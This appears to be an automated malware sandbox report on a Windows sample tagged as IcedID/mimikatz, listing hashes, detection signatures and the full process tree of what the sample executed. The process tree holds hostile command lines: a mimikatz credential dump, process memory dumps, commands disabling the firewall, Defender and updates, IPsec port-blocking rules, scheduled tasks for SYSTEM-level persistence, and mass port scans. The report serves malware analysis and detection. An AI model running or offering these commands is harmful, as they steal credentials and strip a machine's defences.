Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-04-2024 13:47

General

  • Target

    2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe

  • Size

    7.4MB

  • MD5

    db11e4af7e733cec03e3e2d6adac5e23

  • SHA1

    06b123a75427dc7d191767db4595afa352601f7c

  • SHA256

    fea7d8a4ec3966ddf4d847d975d4dbb6505b09a1ffe7af19911c5438946efc74

  • SHA512

    7601e63df35b845b63c03116ecdb4f165d770a6d61194090e5df684853d02f12dad148be70852e2ddc5ffe7743b1de387c3f128314ec6d1b049f388c1b4999f3

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (44846) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 38 IoCs
  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 10 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 59 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2036
      • C:\Windows\TEMP\erzybtpkl\kgtuib.exe
        "C:\Windows\TEMP\erzybtpkl\kgtuib.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1872
    • C:\Users\Admin\AppData\Local\Temp\2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-29_db11e4af7e733cec03e3e2d6adac5e23_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uctlcnkl\lbskpuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4820
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:3968
        • C:\Windows\uctlcnkl\lbskpuk.exe
          C:\Windows\uctlcnkl\lbskpuk.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4992
    • C:\Windows\uctlcnkl\lbskpuk.exe
      C:\Windows\uctlcnkl\lbskpuk.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3228
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:4756
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:4540
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:1848
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:1372
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2336
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:3200
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:3216
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:4392
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\zlitictgt\thiyltjuy\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4460
                          • C:\Windows\zlitictgt\thiyltjuy\wpcap.exe
                            C:\Windows\zlitictgt\thiyltjuy\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:2752
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3620
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2856
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4484
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:2852
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3768
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:2052
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:1256
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:4944
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:4116
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2980
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:2600
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:4584
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:4900
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:3000
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zlitictgt\thiyltjuy\Scant.txt
                                                2⤵
                                                  PID:4504
                                                  • C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe
                                                    C:\Windows\zlitictgt\thiyltjuy\gcmiezrkb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zlitictgt\thiyltjuy\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2924
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\zlitictgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zlitictgt\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:1544
                                                  • C:\Windows\zlitictgt\Corporate\vfshost.exe
                                                    C:\Windows\zlitictgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3528
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kbiptzjfp" /ru system /tr "cmd /c C:\Windows\ime\lbskpuk.exe"
                                                  2⤵
                                                    PID:3952
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:4720
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "kbiptzjfp" /ru system /tr "cmd /c C:\Windows\ime\lbskpuk.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:3584
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zcskltljl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F"
                                                      2⤵
                                                        PID:1484
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:2044
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "zcskltljl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:1412
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lqbqicitb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F"
                                                          2⤵
                                                            PID:4520
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:4672
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "lqbqicitb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:808
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:2976
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:4316
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:4332
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:3496
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:1216
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:3040
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:2196
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:3728
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:2400
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:3844
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:4756
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:2420
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:1648
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:3200
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:2240
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:4592
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:4072
                                                                                            • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                              C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 784 C:\Windows\TEMP\zlitictgt\784.dmp
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2676
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:2692
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:5100
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:2464
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:1312
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:4724
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:3100
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:816
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:536
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:3076
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:3736
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:4852
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:3012
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1544
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:4672
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2512
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:4260
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:624
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:1300
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3108
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:436
                                                                                                                        • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                          C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 60 C:\Windows\TEMP\zlitictgt\60.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1256
                                                                                                                        • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                          C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2036 C:\Windows\TEMP\zlitictgt\2036.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4556
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\zlitictgt\thiyltjuy\scan.bat
                                                                                                                          2⤵
                                                                                                                            PID:4560
                                                                                                                            • C:\Windows\zlitictgt\thiyltjuy\kybllnpce.exe
                                                                                                                              kybllnpce.exe TCP 14.159.0.1 14.159.255.255 445 512 /save
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4952
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2504 C:\Windows\TEMP\zlitictgt\2504.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5484
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2880 C:\Windows\TEMP\zlitictgt\2880.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3232
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3056 C:\Windows\TEMP\zlitictgt\3056.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:6124
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 2560 C:\Windows\TEMP\zlitictgt\2560.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5796
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3760 C:\Windows\TEMP\zlitictgt\3760.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3420
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3852 C:\Windows\TEMP\zlitictgt\3852.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2732
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3912 C:\Windows\TEMP\zlitictgt\3912.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5508
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4008 C:\Windows\TEMP\zlitictgt\4008.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4308
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4904 C:\Windows\TEMP\zlitictgt\4904.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2568
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 1740 C:\Windows\TEMP\zlitictgt\1740.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5012
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 812 C:\Windows\TEMP\zlitictgt\812.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5900
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4432 C:\Windows\TEMP\zlitictgt\4432.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4852
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 3112 C:\Windows\TEMP\zlitictgt\3112.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:672
                                                                                                                          • C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe
                                                                                                                            C:\Windows\TEMP\zlitictgt\phqiqqbrk.exe -accepteula -mp 4560 C:\Windows\TEMP\zlitictgt\4560.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3972
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:2060
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:2920
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:4460
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:3620
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:1260
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:6016
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5400
                                                                                                                                      • C:\Windows\SysWOW64\lqrjma.exe
                                                                                                                                        C:\Windows\SysWOW64\lqrjma.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1040
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F
                                                                                                                                        1⤵
                                                                                                                                          PID:5184
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            2⤵
                                                                                                                                              PID:3008
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\erzybtpkl\kgtuib.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:456
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F
                                                                                                                                              1⤵
                                                                                                                                                PID:4872
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5448
                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                    cacls C:\Windows\uctlcnkl\lbskpuk.exe /p everyone:F
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5044
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lbskpuk.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1836
                                                                                                                                                      • C:\Windows\ime\lbskpuk.exe
                                                                                                                                                        C:\Windows\ime\lbskpuk.exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:2756

                                                                                                                                                    Network

